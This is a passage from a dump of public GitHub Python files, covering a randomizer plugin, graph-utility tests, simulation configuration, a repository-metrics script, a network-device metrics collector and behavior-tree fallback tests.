4_000_000)}')\n","repo_name":"Steve2608/AoC-2022","sub_path":"15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71719137437","text":"from random import randint\nfrom cyckei.plugins import cyp_base\nimport json\n\ndefault_config = 
json.loads(\n \"\"\"\n {\n \"name\": \"randomizer\",\n \"enabled\": true,\n \"sources\": [\n {\n \"port\": null,\n \"meta\": [1, 10]\n },\n {\n \"port\": null,\n \"meta\": [11, 20]\n }\n ]\n }\n \"\"\"\n)\n\n\nclass PluginController(cyp_base.BaseController):\n def __init__(self, sources):\n super().__init__(\n \"randomizer\",\n \"Generates random values, as an example.\"\n )\n\n # Create a randomizer object\n self.sources = self.load_sources(sources)\n self.logger.info(f\"Created {len(self.sources)} Randomizer(s)\")\n\n # List of names to declare to Cyckei\n self.names = []\n for source in self.sources:\n self.names.append(str(source))\n\n def load_sources(self, config_sources):\n \"\"\"\n Searches for available sources, and establishes source objects.\n\n Returns\n -------\n Dictionary of sources in format \"name\": SourceObject.\n \"\"\"\n\n # Sources don't need to be found for this plugin,\n # so we just initialize two randomizers as examples\n sources = {}\n for source in config_sources:\n object = PluginSource(source[\"meta\"])\n sources[object.name] = object\n\n return sources\n\n\nclass PluginSource(cyp_base.BaseSource):\n def __init__(self, range):\n super().__init__()\n self.range = range\n self.name = f\"Random {range[0]}-{range[1]}\"\n\n def read(self):\n return randint(self.range[0], self.range[1])\n\n\nif __name__ == \"__main__\":\n sources = default_config[\"sources\"]\n controller = PluginController(sources)\n print(cyp_base.read_all(controller))\n","repo_name":"cyclikal/cyp-randomizer","sub_path":"randomizer/randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13481011586","text":"import copy\nimport numpy as np\nimport unittest\n\nfrom ugd.help_function.graph_creation import graph_to_adj_m, adj_m_to_graph\nfrom ugd.help_function.util import get_path\nfrom ugd.schlaufen_construction.di_schlaufen_construction_util import mark_edge\nfrom test.test_resources.graphs_two_restriction_sets import graph1, graph1_adj_m\n\n\nclass HelpFunctionsAndUtil(unittest.TestCase):\n\n\n\n def test_adj_m_to_graph(self):\n adj_m = graph1_adj_m\n graph = adj_m_to_graph(adj_m, is_directed=True)\n adj_m_2 = graph_to_adj_m(graph)\n assert np.array_equal(adj_m_2 , adj_m)\n\n\n def test_graph_to_adj_m(self):\n graph = graph1\n adj_m = graph1_adj_m\n graph_copy = copy.deepcopy(graph)\n adj_m_verg = graph_to_adj_m(graph_copy)\n assert np.array_equal(adj_m_verg, adj_m)\n\n\n def test_get_path(self):\n pathgraph = copy.deepcopy(graph1)\n mark_edge(pathgraph, 3, 2, True, 1)\n mark_edge(pathgraph, 2, 1, False, 1)\n mark_edge(pathgraph, 1, 0, True, 1)\n mark_edge(pathgraph, 0, 3, False, 1)\n active_start = True\n\n path = get_path(3, active_start, pathgraph, 1)\n assert path == [3,2,1,0,3]","repo_name":"AndrinPelican/ugd","sub_path":"test/test_util_and_helpfunctions.py","file_name":"test_util_and_helpfunctions.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"72956560797","text":"from GL import *\nimport simulation\nreload(simulation)\nimport sim_colors\n\nif 1:\n sim_ms = nar(['half','1','2','3','4','5','6'])\n sim_ms_f = nar([0.5,1,2,3,4,5,6])\n sim_ma = nar(['half','1','2'])\n sim_ma_f = nar([0.5,1,2])\nif 0:\n #for kludging\n sim_ms = nar(['half','1','2','3'])\n sim_ms_f = nar([0.5,1,2,3])\n sim_ma = nar(['half','1','2'])\n sim_ma_f = 
nar([0.5,1,2])\n\n#color_by_mach = {'half':'c','1':'m','2':'b','3':'g','5':'r'}\ncolor_by_mach = {'half':'red','1':'orange','2':'g','3':'b','4':'violet','5':'brown','6':'black'}\nline_by_alf_mach = {'half':':','1':'--','2':'-'}\nmarker_by_alf_mach = {'half':'.','1':'^','2':'s'}\n\nplot_order=[]\ncolor={}\nlinestyle={}\nmarker={}\nglyph={}\ntdyn={}\nfor nma,ma in enumerate(sim_ma):\n for nmach,ms in enumerate(sim_ms):\n sim=\"%s_%s\"%(ms,ma)\n plot_order.append(sim)\n color[sim]=color_by_mach[ms]\n linestyle[sim]=line_by_alf_mach[ma]\n marker[sim] = marker_by_alf_mach[ma]\n #glyph = color[sim]+linestyle[sim]\n tdyn[sim] = 0.5/sim_ms_f[nmach]\n\n#auto gen, don't touch\nsimlist = nar([ '%s_%s'%(ms,ma) for ms in sim_ms for ma in sim_ma])\n\nmarkerlist = nar([ marker['%s_%s'%(ms,ma)] for ms in sim_ms for ma in sim_ma])\ncolorlist = nar([ color['%s_%s'%(ms,ma)] for ms in sim_ms for ma in sim_ma])\nlinelist = nar([ linestyle['%s_%s'%(ms,ma)] for ms in sim_ms for ma in sim_ma])\n\ndef vals_from_sim(sim):\n ms,ma = sim.split(\"_\")\n if ms == 'half':\n ms = 0.5\n if ma == 'half':\n ma = 0.5\n ms=float(ms)\n ma=float(ma)\n return ms,ma\n\nms_list=[]\nma_list=[]\nfor sim in simlist:\n ms,ma = vals_from_sim(sim)\n ms_list.append( ms)\n ma_list.append(ma)\nms_list=nar(ms_list)\nma_list=nar(ma_list)\nMs = dict(zip(simlist,ms_list))\nMa = dict(zip(simlist,ma_list))\n\ndef lrange(*args):\n return list(range(*args))\nthree_half_range = list( range(70,85))+list(range(86,93))\nanalysis_frames={\n \"half_half\":lrange(11,30)+lrange(31,32),\"half_1\":lrange(11,30)+lrange(31,32),\"half_2\":lrange(11,30)+lrange(31,32),\n \"1_half\":lrange(11,30)+lrange(31,32),\"1_1\":lrange(11,30)+lrange(31,32),\"1_2\":lrange(11,30)+lrange(31,32),\n \"2_half\":lrange(65,84)+lrange(85,86),\"2_1\":lrange(11,30)+lrange(31,32),\"2_2\":lrange(11,26)+lrange(27,32),\n #\"3_half\":lrange(72,93),\"3_1\":lrange(56,75),\"3_2\":lrange(20,40),\n \"3_half\":lrange(70,85)+lrange(90,30)+lrange(91,93),\"3_1\":lrange(53,74)+lrange(75,77),\"3_2\":lrange(9,39)+lrange(40,41),\n #'4_half':lrange(12,19), '4_1':lrange(12,22),'4_2':lrange(12,25),\n #'4_half':lrange(15,45), '4_1':lrange(15,52),'4_2':lrange(15,52),\n '4_half':lrange(14,31)+lrange(32,45), '4_1':lrange(16,23)+lrange(24,52),'4_2':lrange(15,37)+lrange(38,52),\n \"5_half\":lrange(11,40)+lrange(41,60),\"5_1\":lrange(4,37)+lrange(38,49),\"5_2\":lrange(4,46)+lrange(48,60),\"5_3\":lrange(5,59),\n '6_half':lrange(17,39)+lrange(40,46), '6_1':lrange(15,30)+lrange(31,52),'6_2':lrange(16,30)+lrange(31,52)}\n\nfor sim in simlist:\n simulation.sim(sim, data_location=dl.sim_dir_base+sim, product_location=dl.product_dir_base+sim, ms=Ms[sim], ma=Ma[sim],\n color=color[sim],linestyle=linestyle[sim],marker=marker[sim],\n framelist=analysis_frames[sim])\n","repo_name":"dcollins4096/p49d_turb_sims","sub_path":"python/simulation_info/suite_1.py","file_name":"suite_1.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"38938515276","text":"a = -1 # integer int\nb = 1.2 # floating point float\nc = 1 + 2j # complex number complex\nd = True # boolean bool\ne = False # boolean bool\nf = 'abc' # string str\ng = ('a','b') # tuple\nh = [1,8,2,3] # list\nh1 = [4,7,5,6]\ni = {\"name\": \"xiaoming\", \"age\": 18} # dictionary dict\nj = set('1,2,3') # set\nl = None # None, a special empty value\n\n\nprint(type(j))\n\n# ziped = list(zip(h,h1))\n# print(ziped)\n# print(list(enumerate(h)))\n# h1.remove(5)\nprint(sorted(h1))\nh.sort()\nprint(h)\n\n\n# print(h1)\n\n\n\n#
print(\"hello\".center(30,\"*\"))\n","repo_name":"LinearPi/tanzhou_work_file","sub_path":"oneDay/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30753517654","text":"# -*- coding: utf-8 -*-\n# Author: Felipe Fronchetti\n# Contact: fronchettiemail@gmail.com\n\ntry:\n import os\n import csv\n import json\n import numpy\n from datetime import timedelta\n from datetime import datetime\n from collections import Counter\nexcept ImportError as error:\n raise ImportError(error)\n\nclass Indicators():\n\n def __init__(self, repository, folder):\n self.folder = folder\n\n def pulls_per_month(self):\n pull_file = json.load(open(self.folder + '/pull_requests.json', 'r'))\n pull_list = []\n opened_list = []\n merged_list = []\n closed_list = []\n\n for line in pull_file:\n pull_list.append(datetime.strptime(\n line['created_at'], '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n\n if line['closed_at'] is not None:\n if line['merged_at'] is not None:\n merged_date = line['merged_at']\n merged_list.append(datetime.strptime(\n merged_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n else:\n closed_date = line['closed_at']\n closed_list.append(datetime.strptime(\n closed_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n else:\n opened_date = line['created_at']\n opened_list.append(datetime.strptime(\n opened_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n\n pull_ordered_list = Counter(pull_list)\n pull_ordered_list = [item[1] for item in pull_ordered_list.items()]\n\n opened_ordered_list = Counter(opened_list)\n opened_ordered_list = [item[1] for item in opened_ordered_list.items()]\n\n closed_ordered_list = Counter(closed_list)\n closed_ordered_list = [item[1] for item in closed_ordered_list.items()]\n\n merged_ordered_list = Counter(merged_list)\n merged_ordered_list = [item[1] for item in merged_ordered_list.items()]\n\n return numpy.mean(pull_ordered_list), numpy.mean(opened_ordered_list), numpy.mean(closed_ordered_list), numpy.mean(merged_ordered_list)\n\n def commits_per_month(self):\n contribution_file = open(self.folder + '/contributions.txt', 'r')\n contribution_list = []\n\n for line in contribution_file:\n contribution_date = line.strip()\n\n if contribution_date:\n contribution_list.append(datetime.strptime(\n contribution_date, '%Y-%m-%d').date().replace(day=15))\n\n contribution_ordered_list = Counter(contribution_list)\n contribution_ordered_list = [item[1]\n for item in contribution_ordered_list.items()]\n\n return numpy.mean(contribution_ordered_list)\n\n def stars_per_month(self):\n stars_file = json.load(open(self.folder + '/stars.json', 'r'))\n star_list = []\n\n for line in stars_file:\n star_date = line['starred_at']\n\n if star_date:\n star_list.append(datetime.strptime(\n star_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n\n star_ordered_list = Counter(star_list)\n star_ordered_list = [item[1] for item in star_ordered_list.items()]\n\n return numpy.mean(star_ordered_list)\n\n def forks_per_month(self):\n forks_file = json.load(open(self.folder + '/forks.json', 'r'))\n fork_list = []\n\n for line in forks_file:\n fork_date = line['created_at']\n\n if fork_date:\n fork_list.append(datetime.strptime(\n fork_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n\n fork_ordered_list = Counter(fork_list)\n fork_ordered_list = [item[1] for item in fork_ordered_list.items()]\n\n return numpy.mean(fork_ordered_list)\n\n def 
languages_counter(self):\n languages_file = json.load(open(self.folder + '/languages.json', 'r'))\n number_of_used_languages = len(languages_file)\n return number_of_used_languages\n\n def has_readme(self):\n if os.path.isfile(self.folder + '/repository/README.MD') or os.path.isfile(self.folder + '/repository/README.md') or os.path.isfile(self.folder + '/repository/README'):\n return 1\n else:\n return 0\n\n def has_contributing(self):\n if os.path.isfile(self.folder + '/repository/CONTRIBUTING.MD') or os.path.isfile(self.folder + '/repository/CONTRIBUTING.md') or os.path.isfile(self.folder + '/repository/CONTRIBUTING'):\n return 1\n else:\n return 0\n\n def has_wiki(self):\n about_file = json.load(open(self.folder + '/about.json', 'r'))\n\n if about_file['has_wiki']:\n return 1\n else:\n return 0\n\n def has_project_board(self):\n about_file = json.load(open(self.folder + '/about.json', 'r'))\n\n if about_file['has_projects']:\n return 1\n else:\n return 0\n\n def has_issue_tracker(self):\n about_file = json.load(open(self.folder + '/about.json', 'r'))\n\n if about_file['has_issues']:\n return 1\n else:\n return 0\n\nif os.path.isfile('projects.json'):\n with open('projects.json', 'r') as file:\n dictionary = json.load(file)\nelse:\n print('Error processing projects.json file.')\n print('\\033[97m\\033[1m-> A file with a projects list does not exist. \\033[0m Please, collect it first.')\n raise\n\n# In this step, we'll create the indicators data per project.\n# The respective file in the repository is data_indicators_output.csv\n\nfieldnames = ['project_name', 'pull_total_mean',\n 'pull_opened_mean', 'pull_closed_mean',\n 'pull_merged_mean', 'commits_mean',\n 'stars_mean', 'forks_mean', 'languages_count',\n 'has_readme', 'has_contributing',\n 'has_wiki', 'has_project_board', 'has_issue_tracker']\n\nwith open('data_indicators_output.csv', 'w') as statistics_file:\n writer = csv.DictWriter(statistics_file, fieldnames=fieldnames)\n writer.writeheader()\n\nfor language in dictionary.keys():\n repositories = dictionary[language]['items']\n\n for repository in repositories:\n dataset_folder = 'Dataset' + '/' + \\\n language + '/' + repository['name']\n\n A = Indicators(repository, dataset_folder)\n pull_total_mean, pull_opened_mean, pull_closed_mean, pull_merged_mean = A.pulls_per_month()\n commits_mean = A.commits_per_month()\n stars_mean = A.stars_per_month()\n forks_mean = A.forks_per_month()\n languages_count = A.languages_counter()\n has_readme = A.has_readme()\n has_contributing = A.has_contributing()\n has_wiki = A.has_wiki()\n has_project_board = A.has_project_board()\n has_issue_tracker = A.has_issue_tracker()\n\n with open('data_indicators_output.csv', 'a') as statistics_file:\n writer = csv.DictWriter(statistics_file, fieldnames=fieldnames)\n writer.writerow({'project_name': repository['name'],\n 'pull_total_mean': int(numpy.nan_to_num(pull_total_mean)),\n 'pull_opened_mean': int(numpy.nan_to_num(pull_opened_mean)),\n 'pull_closed_mean': int(numpy.nan_to_num(pull_closed_mean)),\n 'pull_merged_mean': int(numpy.nan_to_num(pull_merged_mean)),\n 'commits_mean': int(numpy.nan_to_num(commits_mean)),\n 'stars_mean': int(numpy.nan_to_num(stars_mean)),\n 'forks_mean': int(numpy.nan_to_num(forks_mean)),\n 'languages_count': languages_count,\n 'has_readme': has_readme,\n 'has_contributing': has_contributing,\n 'has_wiki': has_wiki,\n 'has_project_board': has_project_board,\n 'has_issue_tracker': 
has_issue_tracker})\n","repo_name":"TiagoDanin-Forks/TCC-UTFPR","sub_path":"data_indicators.py","file_name":"data_indicators.py","file_ext":"py","file_size_in_byte":8056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40303098474","text":"from noc.sa.profiles.Generic.get_metrics import Script as GetMetricsScript, metrics\nfrom noc.core.text import parse_table\n\n\ndef convert_string(v):\n return float(v)\n\n\nclass Script(GetMetricsScript):\n name = \"Alstec.24xx.get_metrics\"\n\n SENSOR_OID_SCALE = {\n \"1.3.6.1.4.1.27142.1.2.45.1.5.6.0\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.3.8.0\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.3.9.0\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.8.0\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.10.1.2.1\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.10.1.2.2\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.10.1.2.3\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.10.1.2.4\": convert_string,\n }\n\n @metrics([\"CPU | Load | 1min\"], volatile=False, access=\"C\") # CLI version\n def get_cpu_metrics(self, metrics):\n v = self.cli(\"show process cpu\")\n v = parse_table(v)\n if v:\n self.set_metric(id=(\"CPU | Load | 1min\", None), value=float(v[-1][-1][:-1]))\n\n @metrics([\"Memory | Load | 1min\"], volatile=False, access=\"C\") # CLI version\n def get_memory_metrics(self, metrics):\n try:\n v = self.cli(\"show resources\")\n except self.CLISyntaxError:\n return\n r = {}\n column = None\n for line in v.splitlines():\n if not line:\n continue\n if not line.startswith(\" \"):\n column = line.strip().lower()\n if column:\n k, v = line.split(\":\")\n r[column + k.strip().lower()] = v.strip()\n if r.get(\"ram:total\") and r.get(\"ram:used\"):\n used = int(r.get(\"ram:used\").split(\" \")[0])\n total = int(r.get(\"ram:total\").split(\" \")[0])\n self.set_metric(id=(\"Memory | Load | 1min\", None), value=round(used * 100.0 / total))\n\n @metrics(\n [\"Interface | Errors | CRC\", \"Interface | Errors | Frame\"],\n has_capability=\"DB | Interfaces\",\n volatile=False,\n matcher=\"is_builtin_controller\",\n access=\"C\", # CLI version\n )\n def get_interface_metrics(self, metrics):\n v = self.cli(\"show box-shso counters\")\n v = self.profile.parse_kv_out(v)\n metric_map = {\n \"CRC errors\": \"Interface | Errors | CRC\",\n \"Invalid frame length\": \"Interface | Errors | Frame\",\n }\n for iface in v:\n for m in metric_map:\n if m not in v[iface]:\n continue\n self.set_metric(\n id=(metric_map[m], [\"noc::interface::0/0\"]), value=int(v[iface][m]), units=\"pkt\"\n )\n\n @metrics(\n [\n \"Environment | Electric current\",\n \"Environment | Sensor Status\",\n \"Environment | Temperature\",\n \"Environment | Voltage\",\n ],\n volatile=False,\n matcher=\"is_builtin_controller\",\n access=\"C\", # CLI version\n )\n def get_boxshso_metrics(self, metrics):\n modules = {\n \"black_box\": \"show box-shso bb\",\n \"battery_pack\": \"show box-shso bp\",\n \"main_power_supply\": \"show box-shso pum\",\n }\n for module, command in modules.items():\n try:\n v = self.cli(command)\n except self.CLISyntaxError:\n continue\n v = self.profile.parse_kv_out(v)\n for m, v in v.items():\n if v == \"N/A\" or v.startswith(\"No\"):\n # Not connected sensor\n continue\n m = m.lower()\n if m.startswith(\"temperature\"):\n self.set_metric(\n id=(\"Environment | Temperature\", None),\n metric=\"Environment | Temperature\",\n labels=[\"noc::sensor::Temperature_%s\" % module],\n 
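                        # v is a string like \"<value> <unit>\" from parse_kv_out; keep only the numeric part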
value=float(v.split()[0]),\n units=\"C\",\n multi=True,\n )\n elif \"voltage\" in m:\n self.set_metric(\n id=(\"Environment | Voltage\", None),\n metric=\"Environment | Voltage\",\n labels=[\"noc::sensor::Voltage_%s\" % module],\n value=float(v.split()[0]),\n units=\"VDC\",\n multi=True,\n )\n elif \"current\" in m:\n self.set_metric(\n id=(\"Environment | Electric current\", None),\n metric=\"Environment | Electric current\",\n labels=[\"noc::sensor::ElectricCurrent_%s\" % module],\n value=float(v.split()[0]) * 1000.0,\n multi=True,\n units=\"A\",\n )\n elif \"door state\" in m:\n self.set_metric(\n id=(\"Environment | Sensor Status\", None),\n metric=\"Environment | Sensor Status\",\n labels=[\"noc::sensor::State_Door\"],\n value=bool(\"Open\" in v),\n multi=True,\n )\n elif \"batteries circuit-breaker state\" in m:\n self.set_metric(\n id=(\"Environment | Sensor Status\", None),\n metric=\"Environment | Sensor Status\",\n labels=[\"noc::sensor::State_Batteries\"],\n value=bool(\"On\" in v),\n multi=True,\n )\n","repo_name":"nocproject/noc","sub_path":"sa/profiles/Alstec/24xx/get_metrics.py","file_name":"get_metrics.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"27377626829","text":"from unittest.mock import call\n\nfrom carebt.abstractLogger import LogLevel\nfrom carebt.behaviorTreeRunner import BehaviorTreeRunner\nfrom carebt.nodeStatus import NodeStatus\nfrom tests.fallbackNodes import AddTwoNumbersFallback1\nfrom tests.fallbackNodes import AddTwoNumbersFallback2\nfrom tests.fallbackNodes import AddTwoNumbersFallback3\nfrom tests.fallbackNodes import AddTwoNumbersFallback4\nfrom tests.fallbackNodes import AddTwoNumbersFallback5\nfrom tests.fallbackNodes import AddTwoNumbersFallback6\nfrom tests.fallbackNodes import AddTwoNumbersFallback6a\nfrom tests.fallbackNodes import AddTwoNumbersFallback7\nfrom tests.fallbackNodes import AsyncAddChildFallback\nfrom tests.fallbackNodes import RemoveAllChildrenFallback\nfrom tests.global_mock import mock\n\n########################################################################\n\n\nclass TestFallbackNode:\n \"\"\"Tests the `AddTwoNumbersFallback1`.\"\"\"\n\n ########################################################################\n\n def test_AddTwoNumbersFallback1(self):\n \"\"\"Tests the AddTwoNumbersFallback1.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AddTwoNumbersFallback1)\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback1'),\n call('on_init AddTwoNumbersFallback1'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: calculating: 2 + 4 = 6'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete AddTwoNumbersFallback1'),\n call('__del__ AddTwoNumbersFallback1')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback2(self):\n \"\"\"Tests the AddTwoNumbersFallback2.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AddTwoNumbersFallback2)\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert 
bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback2'),\n call('on_init AddTwoNumbersFallback2'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: calculating: 3 + 6 = 9'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete AddTwoNumbersFallback2'),\n call('__del__ AddTwoNumbersFallback2')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback3(self):\n \"\"\"Tests the AddTwoNumbersFallback3.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AddTwoNumbersFallback3)\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback3'),\n call('on_init AddTwoNumbersFallback3'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: calculating: 2 + 4 = 6'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete AddTwoNumbersFallback3'),\n call('__del__ AddTwoNumbersFallback3')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback4(self):\n \"\"\"Tests the AddTwoNumbersFallback4.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AddTwoNumbersFallback4)\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.FAILURE\n assert bt_runner._instance.get_contingency_message() == 'NOT_TWO_NUMBERS_PROVIDED'\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback4'),\n call('on_init AddTwoNumbersFallback4'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete 
AddTwoNumbersFallback4'),\n call('__del__ AddTwoNumbersFallback4')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback5(self):\n \"\"\"Tests the AddTwoNumbersFallback5.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.get_logger().set_log_level(LogLevel.DEBUG)\n bt_runner.run(AddTwoNumbersFallback5)\n assert mock.called\n assert bt_runner.get_status() == NodeStatus.ABORTED\n assert bt_runner.get_contingency_message() == 'NOT_TWO_NUMBERS_PROVIDED'\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback5'),\n call('on_init AddTwoNumbersFallback5'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('AddTwoNumbersFallback5: handle_missing_numbers'),\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_abort AddTwoNumbersFallback5'),\n call('on_delete AddTwoNumbersFallback5'),\n call('__del__ AddTwoNumbersFallback5')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback6(self):\n \"\"\"Tests the AddTwoNumbersFallback6.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.get_logger().set_log_level(LogLevel.DEBUG)\n bt_runner.run(AddTwoNumbersFallback6)\n assert mock.called\n assert bt_runner.get_status() == NodeStatus.SUCCESS\n assert bt_runner.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback6'),\n call('on_init AddTwoNumbersFallback6'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('AddTwoNumbersFallback6: handle_missing_numbers'),\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ HelloWorldAction'),\n call('HelloWorldAction: Hello World !!!'),\n call('__del__ HelloWorldAction'),\n call('on_delete AddTwoNumbersFallback6'),\n call('__del__ AddTwoNumbersFallback6')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback6a(self):\n \"\"\"Tests the AddTwoNumbersFallback6a.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.get_logger().set_log_level(LogLevel.DEBUG)\n bt_runner.run(AddTwoNumbersFallback6a)\n assert mock.called\n assert bt_runner.get_status() == NodeStatus.SUCCESS\n assert bt_runner.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback6a'),\n call('on_init AddTwoNumbersFallback6a'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('AddTwoNumbersFallback6a: handle_missing_numbers'),\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: calculating: 3 + 6 = 9'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete 
AddTwoNumbersFallback6a'),\n call('__del__ AddTwoNumbersFallback6a')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback7(self):\n \"\"\"Tests the AddTwoNumbersFallback7.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.get_logger().set_log_level(LogLevel.DEBUG)\n bt_runner.run(AddTwoNumbersFallback7)\n assert mock.called\n assert bt_runner.get_status() == NodeStatus.ABORTED\n assert bt_runner.get_contingency_message() == 'TIMEOUT'\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback7'),\n call('on_init AddTwoNumbersFallback7'),\n call('__init__ AddTwoNumbersLongRunningAction'),\n call('on_init AddTwoNumbersLongRunningAction'),\n call('AddTwoNumbersLongRunningAction: calculating 2000 ms ...'), # noqa: E501\n call('on_timeout AddTwoNumbersFallback7'),\n call('on_abort AddTwoNumbersLongRunningAction'),\n call('on_delete AddTwoNumbersLongRunningAction'),\n call('on_abort AddTwoNumbersFallback7'),\n call('__del__ AddTwoNumbersLongRunningAction'),\n call('on_delete AddTwoNumbersFallback7'),\n call('__del__ AddTwoNumbersFallback7')]\n\n ########################################################################\n\n def test_AsyncAddChildFallback(self):\n \"\"\"Tests the AsyncAddChildFallback.\"\"\"\n mock.reset_mock()\n bt_runner = 